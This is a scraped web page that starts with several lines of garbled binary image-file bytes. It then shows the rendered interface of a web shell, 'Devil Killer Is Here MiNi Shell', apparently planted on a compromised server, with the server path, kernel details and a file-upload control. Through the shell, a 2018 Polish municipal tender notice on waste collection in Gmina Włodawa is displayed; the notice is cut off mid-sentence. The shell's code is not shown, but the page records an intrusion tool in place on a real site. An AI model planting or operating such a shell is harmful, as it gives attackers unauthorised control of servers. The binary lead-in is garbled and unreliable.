JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20181214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20181214/661896-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 661896-N-2018 z dnia 2018-12-14 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Włodawa</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości niezamieszkałych, na których powstają odpady komunalne z terenu Gminy Włodawa</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Włodawa</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">11019786500000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Jana Pawła II</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">22</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">22200 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Włodawa</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">lubelskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">825721234</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">kancelaria@gmina-wlodawa.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">825721234</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.gmina-wlodawa.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.gmina-wlodawa.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"></span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Gminy Włodawa Al. Jana Pawła II nr 22, 22-200 Włodawa</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości niezamieszkałych, na których powstają odpady komunalne z terenu Gminy Włodawa</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">IK.271.7.2018.MZ</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Wykonanie usługi obejmuje:Odbiór i zagospodarowanie odpadów komunalnych pochodzących od właścicieli nieruchomości niezamieszkałych, na których powstają odpady komunalne z terenu Gminy Włodawa, w tym nieruchomości, na których znajdują się domki letniskowe lub inne nieruchomości wykorzystywane jedynie przez część roku w celach rekreacyjno-wypoczynkowych oraz nieruchomości, na których prowadzona jest działalność gospodarcza.Z przedmiotu zamówienia, wyłączono odbiór odpadów:1.	budowlanych pochodzących z rozbiórki, których odbiór winien być realizowany w oparciu o odrębne umowy zawarte przez właściciela nieruchomości z firmą wpisaną do rejestru działalności regulowanej prowadzonego przez Wójta Gminy Włodawa,2.	zużytych opon,3.	powstających na terenie dróg publicznych.Przedmiot zamówienia, realizowany będzie w sposób:1.	zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania, zgodnie z zapisami ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku (Dz. U. z 2018 r., poz. 1454 z późn. zm.) i Wojewódzkiego Planu Gospodarki Odpadami, przyjętego uchwałą Sejmiku Województwa Lubelskiego Nr XXIV/350/2016 z dnia 02 grudnia 2016 roku w sprawie Uchwalenia Planu Gospodarki Odpadami dla Województwa Lubelskiego 2022 z póź. zm.2.	Zgodny z obowiązującymi Uchwałami Rady Gminy Włodawa w zakresie gospodarki odpadami komunalnymi na terenie Gminy Włodawa.3.	Zgodnie z Rozporządzeniem Ministra Środowiska z dnia 29 grudnia 2016 roku w sprawie szczegółowego sposobu selektywnego zbierania wybranych frakcji odpadów. (Dz. U. z 2017 r., poz. 19).4.	Zapewniający ich niezmieszanie z innymi rodzajami odpadów zbieranych w sposób selektywny u źródła w podziale na:o	zmieszane odpady komunalne, w tym pozostałości po segregacji - pojemnik/worek czarny;o	papier i tektura - pojemnik/worek niebieski;o	metale i tworzywa sztuczne, w tym opakowania wielomateriałowe - pojemnik/worek żółty;o	odpady ulegając biodegradacji, w tym bioodpady - pojemnik/worek brązowy;o	odpady wielkogabarytowe, w tym zużyty sprzęt elektryczny i elektroniczny (bez dodatkowego wynagrodzenia) - nie dotyczy działalności gospodarczych.II. Ogólna charakterystyka Gminy Włodawa w kontekście odbioru i zagospodarowania odpadów komunalnych od właścicieli nieruchomości niezamieszkałych, na których powstają odpady komunalne.1.	W skład Gminy Włodawa wchodzi 16 sołectw: Okuninka, Orchówek, Luta, Żłobek, Sobibór, Sobibór Stacja, Korolówka, Korolówka Kolonia, Korolówka Osada, Stawki, Różanka, Szuminka, Suszno, Żuków, Krasówka, Wołczyny.2.	Rodzaj i liczba nieruchomości objętych niniejszym zamówieniem:a)	indywidualne nieruchomości rekreacyjne - około 2 000 szt.,b)	pozostałe nieruchomości niezamieszkałe, na których powstają odpady komunalne, z wyłączeniem indywidualnych nieruchomości rekreacyjnych - około 281 szt.3.	Nazwy miejscowości, w których występują nieruchomości niezamieszkałe, z wyłączeniem indywidualnych nieruchomości rekreacyjnych, oraz ich przybliżona ilość:a) Żuków - 3, b) Korolówka Osada - 2, c) Korolówka wieś - 4, d) Stawki - 1, e) Różanka - 11, f) Szuminka - 2, g) Suszno - 15, h) Orchówek - 28, i) Sobibór - 4, j) Sobibór Stacja - 1, k) Żłobek - 3, l) Okuninka - 207.4.	Szacunkowa ilość odpadów komunalnych przeznaczonych do odbioru w ramach niniejszego zamówienia, (z wyłączeniem odpadów zielonych, wielkogabarytowych, w tym zużyty sprzęt elektryczny i elektroniczny) tj. 1264 Mg w tym:o	niesegregowane (zmieszane) odpady komunalne o kodzie 20 03 01 - 1087,00 Mg,o	inne niewymienione frakcje zbierane w sposób selektywny o kodzie 20 01 99 - 177,00 Mg,5.	Podane dane w Rozdziale II niniejszej SIWZ, są zmienne. Zamawiający zastrzega sobie prawo zmiany wyżej wskazanych ilości. Mogą one wzrosnąć lub zmaleć w ciągu realizacji zamówienia.III. Sposób odbioru odpadów komunalnych z nieruchomości niezamieszkałych, na których powstają odpady komunalne z terenu Gminy Włodawa.1. Nieruchomości, na których znajdują się domki letniskowe lub inne nieruchomości wykorzystywane jedynie przez część roku w celach rekreacyjno-wypoczynkowych.1) powstające na terenie nieruchomości odpady odbierane będą sprzed posesji w dni wyznaczone w harmonogramie. W miejscowości Okuninka oraz w miejscowości Orchówek przy części ul. Wesołej wyłącznie od numeru porządkowego 33 do numeru 161, ze względu na zbyt ścisłą zabudowę rekreacji indywidualnej oraz wąskie drogi prywatne, uniemożliwiające bezkolizyjny dojazd do każdej nieruchomości, dopuszcza się aby odbiór odpadów odbywał się z poboczy dróg gminnych, powiatowych i innych publicznych zlokalizowanych w najbliższym sąsiedztwie danej nieruchomości.2) powstające na nieruchomości odpady gromadzone będą w pojemnikach i/lub workach o pojemności 120 litrów, 240 litrów lub 1100 litrów.3) Wykonawca zobowiązany jest sprawdzać rzetelność segregacji odpadów komunalnych prowadzoną przez właścicieli nieruchomości, a w przypadku niedopełnienia przez nich tego obowiązku , Wykonawca winien odebrać je jako zmieszane odpady komunalne i powiadomić o tym fakcie Zamawiającego. Informacja o zaistniałej nieprawidłowości powinna być przekazywana jako załącznik do sprawozdania miesięcznego 2. Kody kreskowe - nieruchomości, na których znajdują się domki letniskowe lub inne nieruchomości wykorzystywane jedynie przez część roku w celach rekreacyjno-wypoczynkowych. Usługa wykonywana będzie z użyciem kodów kreskowych. Zamawiający wygeneruje dla każdej nieruchomości objętej niniejszym zamówieniem, jedną etykietę z kodem kreskowym dla każdej zbieranej frakcji. W przypadku prowadzenia segregacji odpadów, wygenerowana zostanie: jedna etykieta z opisem ,,odpady segregowane" oraz jedna etykieta z opisem ,,odpady pozostałe po segregacji", oraz jedna etykieta z opisem ,,nieprawidłowość" - tę etykietę Wykonawca wykorzysta wyłącznie w przypadku gdy właściciel danej nieruchomości pomimo deklaracji o segregowaniu odpadów, nie podejmie jej. Dla nieruchomości, na której odpady nie będą zbierane w sposób selektywny, wygenerowana zostanie: jedna etykieta z opisem ,,odpady zmieszane" - niesegregowane. Zamawiający zobowiązany jest przekazać Wykonawcy wszystkie wygenerowane kody kreskowe. Będą one służyły wyłącznie Wykonawcy. W tym celu, Wykonawca zobowiązany jest założyć oddzielny na każdą obsługiwaną miejscowość tzw. ,,Wykaz nieruchomości, na których znajdują się domki letniskowe lub inne nieruchomości wykorzystywane jedynie przez część roku z terenu Gminy Włodawa, dla których wygenerowano i wydrukowano kody kreskowe". Wykaz ten powinien zawierać: adresy nieruchomości i wklejone etykiety z kodami kreskowymi. Wykaz ten Wykonawca zobowiązany jest wykorzystywać podczas każdego odbioru odpadów. Właściciele nieruchomości wystawiając worki z odpadami do odbioru oznaczać je będą, wyłącznie adresem nieruchomości (bez użycia kodów kreskowych). Wykonawca odnajdzie w ,,Wykazie ..." kody kreskowe wygenerowane dla danej nieruchomości a za pomocą czytnika kodów kreskowych, zapisze wystawioną przez właściciela nieruchomości ilość i rodzaj danej frakcji tj. ,,odpady segregowane", lub ,,odpady zmieszane". WAŻNE!!!! Zapisu ilości i frakcji odebranych odpadów, za pomocą czytnika kodów kreskowych, Wykonawca zobowiązany jest dokonywać w miejscu pozostawienia przez właściciela danej nieruchomości worków lub pojemników do ich odbioru. Zamawiający poinformuje właścicieli nieruchomości o sposobie oznakowania worków przeznaczonych do odbioru odpadów.3. Pojemniki i worki do odbioru odpadów komunalnych - nieruchomości, na których znajdują się domki letniskowe lub inne nieruchomości wykorzystywane jedynie przez część roku w celach rekreacyjno-wypoczynkowych.1)	Odbiór odpadów segregowanych od właścicieli nieruchomości odbywać się będzie w systemie workowym lub z pojemników.2)	Pojemnik zapewnia każdy właściciel/zarządca nieruchomości we własnym zakresie.4. Nieruchomości niezamieszkałe, na których powstają odpady komunalne (np. działalność gospodarcza):1)	Odpady gromadzone będą w pojemnikach i/lub w workach o następującej pojemności: 120 litrów, 1100 litrów, 7000 litrów.2)	Rodzaj pojemników i/lub worków, uzależniona jest od ilości odpadów powstających na danej nieruchomości w związku z prowadzoną działalnością gospodarczą.3)	Odbiór odpadów komunalnych odbywać się będzie w systemie workowo - pojemnikowym w dniu wyznaczonym w harmonogramie sprzed nieruchomości, lub z miejsca wyznaczonego przez właściciela danej nieruchomości w uzgodnieniu z podmiotem odbierającym odpady komunalne ale w obrębie tej nieruchomości dla ułatwienia realizacji usługi.4)	Pojemniki i/lub worki na odpady komunalne zapewniają właściciele nieruchomości we własnym zakresie.5)	Obowiązkiem Wykonawcy będzie ciągłe wytwarzanie i dostarczanie właścicielom nieruchomości niezbędnej ilości naklejek z kodami kreskowymi do oznakowania pojemników i/lub worków z odpadami. Naklejki z kodami kreskowymi winny zawierać również zapis słowny określający rodzaj odpadów i adres nieruchomości, której dotyczą wraz z nazwą firmy.6)	W przypadku prowadzenia segregacji odpadów, wygenerowane zostaną: dwie etykiety z opisem ,,odpady segregowane", dwie etykiety z opisem ,,odpady pozostałe po segregacji", oraz jedna etykieta z opisem ,,nieprawidłowość"- ta etykieta będzie służyła tylko Wykonawcy i będzie wyłącznie wykorzystywana w przypadku gdy właściciel danej nieruchomości pomimo deklaracji o segregowaniu odpadów, nie podejmie się jej. Dla nieruchomości, na której odpady nie będą zbierane w sposób selektywny, wygenerowane zostaną: dwie etykiety z opisem ,,odpady zmieszane - niesegregowane". Jedna z etykiet zostanie przekazana właścicielowi nieruchomości zaś druga pozostanie w dyspozycji przedsiębiorstwa odbierającego odpady i zostanie wykorzystana jedynie w przypadku braku oznakowania worka przez właściciela nieruchomości.7)	Obowiązkiem właścicieli nieruchomości jest oznakowanie kodami kreskowymi, pojemników i/lub worków z odpadami komunalnymi.8)	Wykonawca zobowiązany jest sprawdzać rzetelność prowadzonej segregacji odpadów komunalnych przez właścicieli nieruchomości, a w przypadku niedopełnienia przez właściciela nieruchomości obowiązku w zakresie selektywnego zbierania odpadów komunalnych, Wykonawca winien odebrać je jako zmieszane odpady komunalne, zapisać je w sposób o którym mowa pkt 6 i powiadomić o tym fakcie Zamawiającego. Informacja o zaistniałej nieprawidłowości powinna być udokumentowana i przekazywana jako załącznik do sprawozdania miesięcznego wraz z fakturą.9)	W przypadku gdy odbiór odpadów z nieruchomości jest utrudniony z przyczyn niezależnych od Zamawiającego (np. remont drogi, złe warunki atmosferyczne, objazdy, imprezy, droga zastawiona zaparkowanym samochodem), Zamawiający wymaga od Wykonawcy zastosowania indywidualnego podejścia do realizacji zamówienia (np. obsługa innym pojazdem). Wykonawca winien ustalić z właścicielem nieruchomości sposób i termin odbioru odpadów z nieruchomości o utrudnionym dostępie, jednocześnie informując Zamawiającego o sytuacji. Wykonawcy nie będzie przysługiwało jakiekolwiek roszczenie wynikające z tytułu ewentualnego wzrostu kosztów realizacji zamówienia.10) Obowiązkiem Wykonawcy jest sporządzić i dostarczyć właścicielom nieruchomości kody kreskowe w ilości co najmniej 8 szt. na każdą tzw. nieruchomość deklaracyjną (ujętą w przekazanej przez Zmawiającego bazie danych). Wydrukowane na materiale samoprzylepnym, które naklejane będą przez właściciela nieruchomości na worki i/lub pojemniki z odpadami komunalnymi. Uzupełniająca dystrybucja kodów kreskowych, o których mowa powyżej, realizowana będzie przez Wykonawcę na rzecz właściciela nieruchomości w siedzibie Wykonawcy jak również podczas odbioru odpadów komunalnych z nieruchomości.11)	Obowiązkiem Wykonawcy jest ustawienie koszy na wybranych przez Zamawiającego przystankach autobusowych, zlokalizowanych na terenie Gminy Włodawa. W związku z tym, Wykonawca jest obowiązany do wyposażenia koszy ulicznych w worki i ich wymianę.5. Częstotliwość odbioru odpadów komunalnych z terenu Gminy Włodawa - firmy.1.	Odbiór odpadów komunalnych od właścicieli nieruchomości niezamieszkałych, na których powstają odpady komunalne odbywać się będzie z 